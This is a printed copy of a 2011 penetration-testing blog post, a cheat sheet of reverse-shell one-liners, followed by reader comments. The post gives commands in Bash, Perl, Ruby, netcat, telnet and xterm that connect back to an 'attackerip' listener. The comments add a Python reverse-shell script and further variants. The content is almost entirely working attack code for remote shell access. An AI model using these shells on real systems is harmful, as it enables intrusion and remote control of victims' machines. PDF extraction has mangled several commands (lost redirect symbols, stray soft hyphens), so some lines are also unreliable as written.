4/12/2018 Reverse shells one-liners

14th September 2011 Reverse shells one-liners

Inspired by the great blog post [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet] by pentestmonkey.net
[http://pentestmonkey.net/] , I put together the following extra methods and alternatives for some methods explained in the
cheat sheet. There is nothing cutting edge, however you may find this handy during your penetration tests.

Citing pentestmonkey's blog post:

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon
afterwards you’ll probably want an interactive shell.

[...] your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP
port.

Your options for creating a reverse shell are limited by the scripting languages installed on the target
system – though you could probably upload a binary program too if you’re suitably well prepared.

First of all, on your machine, set up a listener, where attackerip is your IP address and 4444 is an arbitrary TCP
port unfiltered by the target's firewall:

attacker$ nc ­l ­v attackerip 4444

Bash

Alternatives for Bash shell:

exec /bin/bash 0&0 2>&0

Or:

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Or:

exec 5<>/dev/tcp/attackerip/4444 
cat <&5 | while read line; do $line 2>&5 >&5; done  # or: 
while read line 0<&5; do $line 2>&5 >&5; done

See also Reverse Shell With Bash [http://www.gnucitizen.org/blog/reverse-shell-with-bash/] from GNUCITIZEN blog
[http://www.gnucitizen.org/blog/] .

Perl

Shorter Perl reverse shell that does not depend on /bin/sh:

perl  ­MIO  ­e  '$p=fork;exit,if($p);$c=new

IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN­>fdopen($c,r);$~­
>fdopen($c,w);system$_ while<>;'

If the target system is running Windows use the following one-liner:

perl  ­MIO  ­e  '$c=new  IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN­

>fdopen($c,r);$~­>fdopen($c,w);system$_ while<>;'

Ruby

http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 1/5
4/12/2018 Reverse shells one-liners

Longer Ruby reverse shell that does not depend on /bin/sh:

ruby  ­rsocket  ­e  'exit  if

fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"
){|io|c.print io.read}end'

If the target system is running Windows use the following one-liner:

ruby  ­rsocket  ­e
'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r")
{|io|c.print io.read}end'

Netcat

Others possible Netcat reverse shells, depending on the Netcat version and compilation flags:

nc ­c /bin/sh attackerip 4444

Or:

/bin/sh | nc attackerip 4444

Or:

rm ­f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

See also 7 Linux Shells Using Built-in Tools [http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/] from

LaNMaSteR53 blog [http://lanmaster53.com/] .

Telnet

Of course, you can also use Telnet as an alternative for Netcat:

rm ­f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

Or:

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445   # Remember to
listen on your machine also on port 4445/tcp

xterm

Follows further details on xterm reverse shell:

To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001). One way to do
this is with Xnest [http://www.xfree86.org/4.4.0/Xnest.1.html] :

Xnest :1

Then remember to authorise on your system the target IP to connect to you:

xterm ­display 127.0.0.1:1  # Run this OUTSIDE the Xnest 
xhost +targetip             # Run this INSIDE the spawned xterm on the open
X Server

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:

http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 2/5
4/12/2018 Reverse shells one-liners
xterm ­display attackerip:1

Or:

$ DISPLAY=attackerip:0 xterm

It will try to connect back to you, attackerip, on TCP port 6001.

Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:

/usr/openwin/bin/xterm ­display attackerip:1

Posted 14th September 2011 by Bernardo Damele A. G.

Labels: bash, connection, linux, nc, netcat, perl, reverse, ruby, shell, solaris, telnet, xterm

9 View comments

Nafeez Ahmed Wednesday, September 14, 2011

Good One !
Reply

jcran Thursday, September 15, 2011

+1 for the xterm, definitely going to make use of that.
Reply

Anonymous Thursday, September 29, 2011

I'm no python guru, but Dave Kennedy posted this code and you might be able to one line this

#!/usr/bin/python
# imports here
import socket,subprocess

HOST = '10.16.44.100' # The remote host

PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send('[*] Connection Established!')
# start loop
while 1:
# recieve shell command
data = s.recv(1024)
# if its quit, then break out and close socket
if data == "quit": break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
# close socket
s.close()

http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 3/5
4/12/2018 Reverse shells one-liners
Cheers,
@DGleebits
Reply

chao-mu Saturday, October 15, 2011

This Perl one-liner connects to a server and evaluates the server's messages as Perl expressions, responding with
the result of those expressions. I wrote it to be short enough to be of a tweetable length and one line; it's not
good/modern Perl.

print $sock eval(<$sock>) while ($sock ||= IO::Socket::INET->new(PeerAddr => "127.0.0.1", PeerPort => "23666"))
Reply

wof Wednesday, March 04, 2015

the original perl example don't work any more since import of IO is depreciated. Fix is:

perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "127.0.0.1:1234");STDIN-

>fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Reply

wof Wednesday, March 04, 2015

simple nc variant with two connections:
nc localhost 1233 | /bin/sh | nc 127.0.0.1 1234
Reply

Darwin Wednesday, June 03, 2015

I think there is a minor typo on the FIFO file object example of both netcat and telnet

I think it should have been

Netcat
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 2>&1

Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 2>&1
Reply

Darwin Thursday, June 04, 2015

I think I am missing something. I am not quite sure how the following would allow for a reverse shell access

exec /bin/bash 0&0 2>&0

Reply

Replies

cameron maerz Saturday, August 01, 2015

it wouldn't, but this does:
/bin/bash -i >& /dev/tcp/attackerip/4444 0>&1

Reply

http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 4/5
4/12/2018 Reverse shells one-liners

Enter your comment...  

Comment as:  Unknown (Goog Sign out

 
Publish Preview   Notify me

http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 5/5